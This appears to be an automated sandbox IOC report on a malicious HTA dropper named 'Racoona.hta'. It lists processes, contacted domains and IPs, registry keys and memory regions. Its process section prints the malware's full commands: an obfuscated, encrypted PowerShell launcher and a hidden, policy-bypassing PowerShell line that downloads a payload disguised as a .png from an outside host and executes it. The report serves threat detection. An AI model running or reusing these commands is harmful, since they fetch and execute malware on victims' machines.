IOC Report
Racoona.hta

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps12108642010010Label

Files

File Path
Type
Category
Malicious
Download
Racoona.hta
exported SGML document, ASCII text, with very long lines (380), with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_010uix5z.ak1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x3bw3pt.wt4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rp4jxyv.mcs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjrkbzn4.rh3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzqufefj.s1f.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm3c2ak4.dj4.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\Racoona.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC   . (   $ p S h O m e [ 4 ] + $ p s H O m e [ 3 4 ] + ' x ' )   ( (   [ R u n t i m e . i N T E r O p S e R V I C e S . M A r S h A l ] : : P t R T o s t R I N g A N S I (   [ R u n T i m E . i N T E r O P S E r v i c E s . M a R s h a l ] : : S e c u r E S T r I N g T O G L O B A L A L L o c a N S I (   $ ( ' 7 6 4 9 2 d 1 1 1 6 7 4 3 f 0 4 2 3 4 1 3 b 1 6 0 5 0 a 5 3 4 5 M g B 8 A F o A W A B r A E M A S A B z A D U A R A B B A E E A a w B w A E M A N A B i A G M A U Q B v A G E A c A B M A E E A P Q A 9 A H w A Z Q A x A D c A O Q A 2 A D M A Z g A y A D Y A N g B j A G M A N A A y A D Q A M g A 0 A D g A M g B m A G Y A Y g A 5 A D g A M w B l A G Y A M A B m A G U A Y w A 3 A D k A Z g A 3 A D Y A Y g B h A D c A N A B j A G Y A Y Q A y A D A A N Q A x A D A A Z g A y A G U A Y w A z A D Q A O A B k A G I A Z A A 0 A G Q A M A B j A G E A Z Q A 1 A G U A Y w A z A D c A Y g B l A D g A M Q A 3 A G M A Z g B k A D I A O Q A 4 A D Q A M g B j A D Y A Z g A x A G Y A M A A 1 A D E A Y Q A 1 A G I A Z A A y A G Y A N Q B k A D M A M g A 4 A D c A Y w A x A D Q A M w B j A G E A N A B i A D I A M A A w A D U A Z Q A z A G Y A O A B k A D Q A Z A A 3 A D I A Y g B i A D M A N g A 1 A G E A Z Q A x A D g A O A B i A D A A Z Q A 1 A D M A N w B l A D A A N w A y A D A A M g A 5 A G U A Y w B l A D I A Z A A 5 A D Y A O Q A x A D Y A O Q A 5 A G Y A N Q B m A G E A O Q A 4 A G Y A M w A 1 A D I A M g B k A D Y A Y w A y A G U A Y w B m A D I A N w A 0 A G E A M w A x A G M A N Q A 2 A D Y A Y Q B k A G Y A Y Q A 3 A G I A M Q B m A G I A M g B h A D E A Z Q B m A D U A N A A y A G M A M w A 1 A G I A O A B h A G Q A Y Q A 5 A G U A M g A z A G M A O Q A 5 A G I A M g A y A D Q A O A A w A D c A Y Q A w A D Q A M A A z A D k A Z Q B l A G U A N A A 4 A G Y A Z g A x A D E A N A B m A D c A Y g B m A D E A M Q B l A G E A Y g A x A G I A Y Q A y A G Q A M w A 5 A G Y A M Q A 3 A D g A M Q A z A D E A M Q B i A D k A Y g B k A D c A M g B l A G Y A N Q B k A D E A M w B h A D g A O A A 3 A G M A M Q A x A D M A M A B l A D E A M A B m A G Q A M g B h A D Y A N Q A x A G M A M w B l A G U A M A B m A D E A M w A y A G M A N g A 0 A G Q A N g B m A D E A M w A 3 A D I A N w B k A D A A M Q A 0 A D g A M Q B m A D Y A M g A 3 A G Q A M w B h A G U A N w B j A G E A Y w B m A D g A M g A 5 A G Q A M A A 5 A D M A Z Q B i A D g A M g A 3 A G Y A N g B j A D A A N w A 1 A G Q A O A B i A D E A O Q B m A G E A Z g B l A D E A Y w A 4 A D U A Z Q B j A D M A O A A 5 A G Y A O A B h A D E A N A B m A D c A O Q A z A G M A Y w A 0 A G Q A O Q B l A D E A M A B l A D E A Z Q B l A G E A N w B l A D I A Y g A 5 A D A A M Q A 3 A G E A M w A 1 A D A A O Q B l A D M A Y Q A 3 A D g A M w A 0 A G Q A Z A A 5 A D g A Z A B k A D g A Y g B m A G Q A O A A z A G E A Y g B h A G M A Z A A 3 A G Y A O A A y A D c A M w A z A D A A N A A 3 A G M A M Q A 3 A D Y A N g B h A G U A N g A 1 A G Q A N w A z A G M A M A B h A D E A Z g B m A D k A Z g A 0 A D M A M Q A 3 A D E A N Q A 1 A D M A Y w A x A G Y A Z g A 4 A D c A N A B h A D k A N A A y A D I A Z Q B i A D E A M A A 1 A D k A Y Q B i A D c A M g A 5 A G M A N A B m A G E A Z g B h A D U A N A B i A D M A N w B k A D M A Y g A x A G M A Y w A z A G M A O A B j A G U A Z g A z A D U A M Q A 4 A D E A N A A 3 A G U A Z Q B k A G E A N Q B m A D M A Z Q A w A G M A M w A w A D E A M A A y A D g A Y g A y A G Y A M A B j A G Q A N w B h A G I A Y g A z A D g A Y Q A w A G Q A Z g B h A G Y A M Q A 4 A D g A N A B j A D c A O Q B k A D U A Y Q A 5 A D E A M w A 1 A G Q A Y w B l A D k A N A A z A D E A Z g A x A D U A M g B m A D A A Y g A z A D Q A Y g A 4 A D M A Y w A 4 A D Y A M w A y A G Q A Z A A 3 A G E A Z Q A 5 A G U A M g A 2 A G Y A Z Q A 5 A D I A Z g A 0 A D E A Z A A 0 A D Q A M A B l A G E A M Q B i A G Y A M Q A 0 A G M A N w A 0 A D E A M g A w A D Q A N Q A 3 A D k A M A A 1 A G M A M g A x A G Q A Z g A 4 A G E A N A A w A D g A O A A 3 A D g A Z Q A 4 A G M A N g A 2 A D Q A M Q B i A D U A O A B m A D Y A N w A w A G I A M A A w A G Q A Z A B h A G Y A Y g B k A G Q A M g A w A D U A N A B m A D g A Z A A z A G Q A Z g A 5 A G E A N w A 4 A D E A M Q B j A D k A N Q A z A G U A Z Q B m A D I A M w A 3 A D Y A N A A 0 A G Q A M Q A x A D U A M A B j A D c A O Q A z A D c A M g A x A G Y A N g A 5 A D U A N A A 2 A D I A Y Q B k A G Y A N A B m A G Y A M Q A 4 A D g A N A B j A G E A Z A A 0 A G U A N w A x A D Q A Z g A 1 A G I A N g A 5 A D c A Z g A 0 A D U A Y w A 4 A D I A M Q A y A G I A Z A B j A D A A Y g B i A G M A M g A 5 A D c A N g A y A D A A M A A 0 A D Q A Y g B h A G M A Z Q A y A G E A Y w A 4 A D U A Z g B l A G M A Z Q B i A D I A M Q B j A D k A Y w A z A D c A O Q A z A D E A Y w B l A D g A Z Q B j A G Q A Y g A 0 A D c A N A B m A D c A Y w B i A D Y A Y g B l A G E A N w A 3 A G U A Z A A w A D g A N A A y A D Y A O A B k A G Y A N w B h A D I A N A B h A G U A Z g A 4 A D I A Y w A 0 A G Q A O A A 5 A D Y A O A A z A D Q A O Q A w A G M A M w B i A D Y A N A A w A D c A Z Q A w A G E A N g A w A D c A Y w A y A D k A M g B m A G M A M g A w A D Y A M w A x A D Y A N A A x A D A A N w A w A G M A Y g B j A G U A O Q B h A D g A M Q B h A G Y A M w B l A D Y A M A A 1 A G Q A Y g A 2 A G Q A Z Q A 0 A D c A M w A 3 A D c A Y Q A 4 A G I A N g A w A D M A Z g A x A G Y A Z Q B h A D E A M A A 5 A G E A N Q A x A D Q A O Q A z A D U A Z Q A 0 A G Y A O A A 3 A D U A N A A z A D M A Z Q B h A D c A Z A A y A D c A Z A A x A G M A O A B m A G I A M g B j A D E A M A A 2 A G Y A M Q A w A D c A Y g A 3 A D c A O A B k A G I A M w A 3 A D I A Y Q A w A G E A N A B m A D A A Z g B h A G I A Z A B h A G I A M Q A 0 A G E A Y g A w A D M A M g A w A D A A N w A 1 A D k A N A B j A D E A N Q B k A D c A M g B k A D g A Z A A 2 A D U A N A B l A G M A M g B k A G Y A Z g A 5 A D Y A Z Q A 3 A D M A M w A 2 A D E A Z Q A 4 A D U A Y w A 2 A D A A Z A B l A G Y A O A A 5 A D M A M A A w A G I A Y w A x A D I A N Q B i A D A A O Q A 5 A D I A M g A 0 A G I A N w A 0 A G I A Z g A 1 A D E A M Q B l A D E A Z A A y A D I A Z g A x A G U A N Q B k A G I A Y Q A y A G M A M A B j A D I A N A A 3 A D A A N A A z A D k A Y g B h A D U A M Q A x A G Y A O A B k A D U A Y Q B k A D Y A N A B i A G Q A O Q A 4 A D Q A M g B j A D I A N Q A 0 A D M A Y w B h A D E A Z Q B l A G I A Z g A y A D Q A M A A w A D E A O Q B k A D Q A N A A x A D Y A M A A w A D E A Z g B k A D A A N g B h A D c A M w A w A D k A Y g A 2 A G I A Z Q A 0 A D Q A O A A 4 A D I A M g B j A D E A Y Q B k A G M A Z g B i A D I A N Q A 0 A D Y A Y Q B i A D k A Z g B k A D Y A N g A 2 A D g A Y g B m A G Y A O A A y A D U A M Q B h A D k A Y g A 1 A D k A Z Q A w A D E A Y g B m A D U A Y w A 3 A D U A M w B i A D A A M Q A 4 A G U A M A A 5 A G Y A Y g A 4 A D k A Y g A y A D U A N w A y A G I A M Q B i A D Q A N Q B l A G M A N g B l A G Y A O Q A 1 A G Q A N Q B i A G U A Z A B k A G U A Y w B k A G E A Y w A 3 A D c A O A A x A G E A N Q B m A G E A Y Q A w A D A A Y w A 1 A G U A M w A x A D c A Y g A 4 A D g A N Q A 5 A D k A N w A z A G Q A Z g A 2 A G U A M Q A 1 A G E A N Q B i A G Y A Z g B j A D Q A Y g A 1 A G Q A M g A 4 A D A A Y Q A x A D Y A Z g A y A G M A Y w A 4 A D I A M A A 3 A G I A N g A 1 A G E A M A A 5 A D E A Z Q A 4 A G I A M Q A z A D k A O Q B i A D Y A N g A 0 A D g A N Q A 4 A G I A M Q B j A G E A Z A B j A D k A M A A w A G Q A Y g A y A G Q A Y Q A 4 A G I A Y g B h A D k A M Q A 1 A G U A Z g B l A D Q A N Q A y A G I A M g B m A G U A M Q B l A D c A Y g A 4 A G M A Y w B m A D U A M w B i A D A A M A A x A D A A M w B i A D U A Y Q A w A G E A N Q A x A D c A M Q B i A G E A M Q B j A D U A Y w A 3 A D Q A N w A w A G Y A O Q A 1 A D U A Y w A 2 A D E A N Q B i A G I A O Q A 3 A D M A Z Q A 2 A D g A Z g A z A D c A M A B m A G E A Y g A 0 A G Q A N w A w A D g A N g B l A G M A M Q A w A G Q A Y w A 3 A G U A M w A 0 A D U A Y g A 4 A D I A Y w B m A D g A O A A 3 A D k A Z Q B h A D U A Z Q A z A D c A Z Q B i A D M A N A B m A G U A Y w A x A D A A O Q B i A G Y A Z Q B l A G M A M Q B i A D Y A N w A y A G U A M g B m A D U A O Q A x A D E A Z A B l A D g A N g B k A G M A Y Q A 2 A D U A Y w A w A G Y A Z g A w A D E A Y Q A 4 A D A A Z Q A x A D c A M g A 1 A D c A O A A 4 A D I A Z Q B h A G M A M A A y A D k A N g A 2 A D U A Z A A 0 A D Y A Y w B l A D Y A Z Q B h A G U A Y w B k A G I A M Q A 5 A G Y A M A B k A D g A Y w B m A D c A Y w A 2 A G M A M A A 4 A D I A N g A 5 A D k A Z Q B m A G E A Y g B j A D g A M g A x A D A A Z A A w A G E A M w A x A G I A Z g B i A D M A N A A 5 A D Q A Z A A y A G U A N w B l A G U A N Q A 4 A D E A M Q B i A G Y A Z g A 5 A D Y A Y w A 0 A D c A M Q A 1 A D A A M g A y A D k A O A B k A G E A N A A 0 A D Y A O A A 1 A G M A Y Q A x A D U A Y Q A 5 A D c A N Q A 2 A D Y A Y g B j A G I A Z g A z A D g A O Q A 1 A G Y A N Q B j A D k A M g B i A D c A Y Q A x A D c A M g B h A D U A M A A z A G I A O Q B l A D M A N Q A 5 A D c A Z Q A 3 A G E A Y Q A 4 A G M A M w A 3 A D U A Y w B l A G E A N A B i A D k A M Q B j A G U A N w A 1 A G I A Z g A 1 A D U A M g A y A D c A Y w A 4 A D Q A O Q B h A D M A O A A 1 A D k A Z A A z A D U A Z A A 1 A D E A Y Q A 2 A D A A Y g A w A D M A N g A 1 A G U A Z Q B h A G I A O A A 1 A D A A O Q A 0 A D Q A M g A y A D M A Z Q A 2 A D Y A M g A x A G U A Y w A 0 A D Q A Y Q A y A D c A Z g A 4 A G M A M Q A w A D g A Z Q B l A D M A M w B k A D Q A Y w A z A G Q A N w A x A G Q A N Q A 4 A D Q A Z A B m A D M A O Q A w A D I A Z g A 4 A G M A N w B i A D k A Y w B k A D Y A O A A 5 A D M A N g A 5 A D c A N g B l A G M A M A A w A D M A Z Q B k A D M A Z Q A 3 A D k A M g B k A G Y A M w A z A G I A M g A 1 A D k A N w A 2 A D U A M A B i A G Q A Y g A 4 A D A A Y w A z A G Y A M w B l A G E A O A B i A D I A N A A y A D k A M w A 1 A G I A Y g B h A D Y A Y Q A x A D g A N w A x A D k A N Q A 2 A G I A N w A 5 A D c A Y Q A x A D c A Z g A 2 A D k A Y Q A 1 A G I A N g B l A G Y A N A B m A D I A M g A x A G U A Z A B k A D c A M w B l A D Y A Z g B l A D M A N Q B h A G E A N g B m A D Y A Z Q A z A D Y A Z Q A 4 A G I A Y w A w A D M A Y g A w A D U A Z g A x A D I A N A A 5 A G Y A Y Q B j A D M A O Q A w A D I A ' |   c o N v e R T t O - s E C u r e S t R i n g     - K     2 4 4 , 1 9 3 , 1 0 2 , 1 9 7 , 2 2 2 , 2 3 , 1 0 0 , 9 3 , 8 0 , 1 8 9 , 6 0 , 2 2 4 , 2 0 8 , 1 2 9 , 6 9 , 8 0 , 2 5 5 , 3 5 , 9 , 2 3 6 , 1 2 4 , 2 4 , 3 2 , 6 3 , 2 4 2 , 2 4 9 , 1 0 8 , 2 4 0 , 1 1 2 , 2 4 0 , 7 1 , 1 3 4 )   )   ) ) )   
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:7y ([Net.WebClient]::New());SV w 'https://56wdf7avyu.kliplytd.shop/e290ec7eeb84ea465f4d2e1441fec32d1.png';&(Alias I*X) (ChildItem Variable:\7y).Value.(((([Net.WebClient]::New()|Member)|Where-Object{(Variable _).Value.Name -clike '*wn*g'}).Name))((ChildItem Variable:/w).Value)
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
suggestyuoz.biz
malicious
https://56wdf7avyu.kliplytd.shop
unknown
malicious
toppyneedus.biz
malicious
https://knowninshea.shop/api
104.21.42.34
malicious
pleasedcfrown.biz
malicious
https://56wdf7avyu.kliplytd.shop/e290ec7eeb84ea465f4d2e1441fec32d1.png
104.21.96.1
malicious
affordtempyo.biz
malicious
lightdeerysua.biz
malicious
impolitewearr.biz
malicious
mixedrecipew.biz
malicious
hoursuhouy.biz
malicious
knowninshea.shop
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://knowninshea.shop/apis7
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://knowninshea.shop/
unknown
https://knowninshea.shop/s
unknown
https://www.filehelpers.net/mustread/
unknown
https://github.com/Pester/Pester
unknown
https://knowninshea.shop/apis
unknown
https://knowninshea.shop/D
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
https://knowninshea.shop:443/api
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
56wdf7avyu.kliplytd.shop
104.21.96.1
malicious
knowninshea.shop
104.21.42.34
malicious

IPs

IP
Domain
Country
Malicious
104.21.42.34
knowninshea.shop
United States
malicious
104.21.96.1
56wdf7avyu.kliplytd.shop
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
87E0000
trusted library section
page read and write
malicious
483D000
stack
page read and write
6DCE000
stack
page read and write
8020000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
73D06000
unkown
page readonly
73C0000
trusted library allocation
page read and write
715E000
stack
page read and write
8250000
heap
page read and write
2E2C000
heap
page read and write
2E24000
heap
page read and write
6355000
heap
page read and write
7341000
heap
page read and write
29C0000
heap
page read and write
8210000
trusted library allocation
page execute and read and write
56FD000
heap
page read and write
7570000
trusted library allocation
page read and write
4C6E000
stack
page read and write
7416000
trusted library allocation
page read and write
AE21000
trusted library allocation
page read and write
8500000
trusted library allocation
page read and write
4E44000
heap
page read and write
7381000
heap
page read and write
474E000
stack
page read and write
577C000
heap
page read and write
CE21000
trusted library allocation
page read and write
75FE000
stack
page read and write
6851000
trusted library allocation
page execute
6F85000
heap
page execute and read and write
7420000
trusted library allocation
page read and write
5766000
heap
page read and write
734F000
heap
page read and write
57CD000
heap
page read and write
4790000
heap
page readonly
292D000
stack
page read and write
5066000
trusted library allocation
page read and write
576A000
heap
page read and write
6E8E000
stack
page read and write
6F5B000
stack
page read and write
66BA000
heap
page read and write
7410000
trusted library allocation
page execute and read and write
84BE000
stack
page read and write
7391000
heap
page read and write
4DB5000
trusted library allocation
page read and write
46B0000
trusted library allocation
page read and write
7F638000
trusted library allocation
page execute and read and write
77A0000
trusted library allocation
page read and write
455E000
stack
page read and write
5792000
heap
page read and write
7790000
trusted library allocation
page read and write
84F0000
trusted library allocation
page read and write
47A8000
trusted library allocation
page read and write
6210000
heap
page read and write
4A9D000
stack
page read and write
5789000
heap
page read and write
6173000
heap
page read and write
4A35000
heap
page execute and read and write
575F000
heap
page read and write
73D2000
heap
page read and write
57A0000
heap
page read and write
56F0000
heap
page read and write
720000
heap
page read and write
52B3000
heap
page read and write
2C19000
trusted library allocation
page read and write
82B0000
trusted library allocation
page read and write
70CE000
stack
page read and write
8100000
trusted library allocation
page read and write
57B9000
heap
page read and write
7600000
trusted library allocation
page read and write
2C03000
trusted library allocation
page execute and read and write
D821000
trusted library allocation
page read and write
2C6E000
stack
page read and write
541E000
trusted library allocation
page read and write
2CD0000
heap
page read and write
72BE000
stack
page read and write
4D83000
trusted library allocation
page read and write
4CAD000
stack
page read and write
4D3E000
stack
page read and write
67F0000
trusted library allocation
page read and write
2BC0000
heap
page read and write
576E000
heap
page read and write
7280000
trusted library allocation
page read and write
711E000
stack
page read and write
747E000
stack
page read and write
847E000
stack
page read and write
57BD000
heap
page read and write
8580000
trusted library allocation
page read and write
73D0D000
unkown
page read and write
737B000
heap
page read and write
57B8000
heap
page read and write
5450000
trusted library allocation
page read and write
62A0000
heap
page read and write
7300000
heap
page read and write
73AC000
heap
page read and write
7060000
trusted library allocation
page read and write
2C7D000
heap
page read and write
5790000
heap
page read and write
66B4000
heap
page read and write
8200000
trusted library allocation
page read and write
57A7000
heap
page read and write
A821000
trusted library allocation
page read and write
72A0000
heap
page read and write
2928000
stack
page read and write
9E21000
trusted library allocation
page read and write
2E29000
heap
page read and write
46E5000
trusted library allocation
page execute and read and write
4B40000
heap
page read and write
6E0E000
stack
page read and write
57BE000
heap
page read and write
70A0000
trusted library allocation
page read and write
29DC000
heap
page read and write
6AB9000
heap
page read and write
73B5000
heap
page read and write
46BE000
stack
page read and write
4C60000
heap
page read and write
6A9A000
heap
page read and write
46C0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
5327000
trusted library allocation
page read and write
7A0000
heap
page read and write
2E2D000
heap
page read and write
2D82000
heap
page read and write
4EF0000
trusted library allocation
page read and write
6FCE000
stack
page read and write
5F71000
trusted library allocation
page read and write
6BE3000
trusted library allocation
page read and write
8C10000
heap
page read and write
2C6D000
heap
page read and write
5FB1000
trusted library allocation
page read and write
6EC000
stack
page read and write
8030000
trusted library allocation
page read and write
72B4000
heap
page read and write
2DB8000
heap
page read and write
46C0000
heap
page read and write
54E4000
trusted library allocation
page read and write
714D000
stack
page read and write
6EE0000
heap
page read and write
46BD000
trusted library allocation
page execute and read and write
505C000
trusted library allocation
page read and write
5DE6000
trusted library allocation
page read and write
63A4000
heap
page read and write
2E1D000
heap
page read and write
52B3000
heap
page read and write
73BC000
heap
page read and write
2C0D000
trusted library allocation
page execute and read and write
2C70000
heap
page read and write
67F9000
trusted library allocation
page read and write
5799000
heap
page read and write
8350000
heap
page read and write
2BC8000
heap
page read and write
6A71000
heap
page read and write
67F9000
trusted library allocation
page read and write
4D8E000
stack
page read and write
57AF000
heap
page read and write
2D30000
heap
page read and write
704E000
stack
page read and write
2D7D000
heap
page read and write
575E000
heap
page read and write
7760000
trusted library allocation
page read and write
67FD000
trusted library allocation
page read and write
76D0000
trusted library allocation
page execute and read and write
8344000
heap
page read and write
2BF2000
heap
page read and write
5DB0000
trusted library allocation
page read and write
5790000
heap
page read and write
5700000
heap
page read and write
8194000
trusted library allocation
page read and write
71CE000
stack
page read and write
29D0000
heap
page read and write
4DFA000
trusted library allocation
page read and write
82D6000
heap
page read and write
4BD0000
heap
page read and write
2D7D000
heap
page read and write
7770000
trusted library allocation
page read and write
5D99000
trusted library allocation
page read and write
7420000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
46C7000
heap
page read and write
4630000
trusted library allocation
page execute and read and write
6802000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
6A71000
heap
page read and write
8190000
trusted library allocation
page read and write
5DFB000
trusted library allocation
page read and write
2E18000
heap
page read and write
6EF0000
heap
page read and write
5F6B000
trusted library allocation
page read and write
8000000
heap
page read and write
2E2D000
heap
page read and write
55ED000
stack
page read and write
5790000
heap
page read and write
575F000
heap
page read and write
6E70000
trusted library allocation
page read and write
2C9A000
heap
page read and write
5273000
heap
page read and write
75B0000
trusted library allocation
page read and write
62E2000
heap
page read and write
67F9000
trusted library allocation
page read and write
73CF1000
unkown
page execute read
2C78000
heap
page read and write
6ACE000
heap
page read and write
8540000
trusted library allocation
page read and write
81B0000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
763F000
stack
page read and write
677F000
heap
page read and write
81B5000
trusted library allocation
page read and write
6F24000
heap
page read and write
95A000
stack
page read and write
2C0C000
heap
page read and write
690000
remote allocation
page execute and read and write
63E6000
heap
page read and write
6363000
heap
page read and write
8560000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
4ACF000
stack
page read and write
46E0000
trusted library allocation
page read and write
2C2A000
trusted library allocation
page execute and read and write
2C26000
trusted library allocation
page execute and read and write
4E80000
heap
page read and write
5764000
heap
page read and write
6EDD000
stack
page read and write
7080000
trusted library allocation
page execute and read and write
5779000
heap
page read and write
67F9000
trusted library allocation
page read and write
67FE000
trusted library allocation
page read and write
680A000
trusted library allocation
page read and write
7FE4000
stack
page read and write
2A45000
heap
page read and write
52B3000
heap
page read and write
45D0000
trusted library allocation
page read and write
6E78000
heap
page read and write
2E24000
heap
page read and write
2DA5000
heap
page read and write
766B000
stack
page read and write
2C20000
trusted library allocation
page read and write
4CC0000
trusted library allocation
page execute and read and write
81FD000
stack
page read and write
4A16000
heap
page read and write
4D80000
trusted library allocation
page read and write
6E6000
remote allocation
page readonly
6363000
heap
page read and write
7740000
trusted library allocation
page read and write
4A10000
trusted library allocation
page execute and read and write
5223000
heap
page read and write
50AC000
trusted library allocation
page read and write
52D0000
heap
page read and write
2F2E000
stack
page read and write
6260000
heap
page read and write
5445000
trusted library allocation
page read and write
6855000
trusted library allocation
page execute
5234000
heap
page read and write
6800000
trusted library allocation
page read and write
6806000
trusted library allocation
page read and write
4A8E000
stack
page read and write
6E1E000
stack
page read and write
67FA000
trusted library allocation
page read and write
2D8E000
stack
page read and write
505E000
trusted library allocation
page read and write
5780000
heap
page read and write
84F0000
trusted library allocation
page execute and read and write
843E000
stack
page read and write
5221000
heap
page read and write
5702000
heap
page read and write
BBEE000
trusted library allocation
page read and write
4D88000
trusted library allocation
page read and write
45D8000
trusted library allocation
page read and write
9B0000
heap
page read and write
5761000
heap
page read and write
52EA000
heap
page read and write
4DB0000
heap
page execute and read and write
733F000
heap
page read and write
5237000
heap
page read and write
6C23000
trusted library allocation
page read and write
86E0000
trusted library allocation
page read and write
7192000
heap
page read and write
4DE0000
heap
page read and write
89CB000
stack
page read and write
753D000
stack
page read and write
6807000
trusted library allocation
page read and write
461C000
stack
page read and write
B187000
trusted library allocation
page read and write
2E8D000
heap
page read and write
82D0000
heap
page read and write
8220000
heap
page read and write
56FD000
heap
page read and write
4E23000
trusted library allocation
page read and write
B1D5000
trusted library allocation
page read and write
478E000
stack
page read and write
2E29000
heap
page read and write
28EC000
stack
page read and write
7400000
trusted library allocation
page read and write
6AC7000
heap
page read and write
80F0000
trusted library allocation
page execute and read and write
2C9A000
heap
page read and write
5237000
heap
page read and write
73CF0000
unkown
page readonly
7560000
trusted library allocation
page read and write
5D91000
trusted library allocation
page read and write
9FD000
stack
page read and write
4D6E000
stack
page read and write
7453000
heap
page read and write
74FE000
stack
page read and write
5799000
heap
page read and write
76E0000
heap
page read and write
73B0000
trusted library allocation
page read and write
6AB2000
heap
page read and write
583F000
trusted library allocation
page read and write
73F0000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
2D73000
heap
page read and write
A00000
heap
page read and write
66C1000
heap
page read and write
2E05000
heap
page read and write
6E9D000
stack
page read and write
4F16000
trusted library allocation
page read and write
73B8000
heap
page read and write
2D4E000
stack
page read and write
8A0D000
stack
page read and write
2E28000
heap
page read and write
2C1D000
trusted library allocation
page execute and read and write
4BB0000
heap
page read and write
6F1D000
stack
page read and write
6650000
trusted library allocation
page read and write
5225000
heap
page read and write
4B4E000
stack
page read and write
9821000
trusted library allocation
page read and write
680D000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
82F0000
heap
page read and write
2DAE000
stack
page read and write
6D6000
remote allocation
page readonly
2C09000
heap
page read and write
46A0000
trusted library allocation
page read and write
531E000
stack
page read and write
720E000
stack
page read and write
80E0000
heap
page read and write
6BC2000
trusted library allocation
page read and write
57B0000
heap
page read and write
86F0000
trusted library allocation
page read and write
4E40000
heap
page read and write
6C98000
trusted library allocation
page read and write
2E0C000
heap
page read and write
2A40000
heap
page read and write
73F5000
heap
page read and write
46B3000
trusted library allocation
page execute and read and write
2DC4000
heap
page read and write
7430000
heap
page execute and read and write
72CD000
heap
page read and write
6F62000
heap
page read and write
6808000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
6D8000
remote allocation
page execute and read and write
5830000
trusted library allocation
page read and write
4D8A000
trusted library allocation
page read and write
4A14000
heap
page read and write
7303000
heap
page read and write
B0F1000
trusted library allocation
page read and write
545B000
trusted library allocation
page read and write
729000
stack
page read and write
82EA000
heap
page read and write
5225000
heap
page read and write
6EA0000
trusted library allocation
page read and write
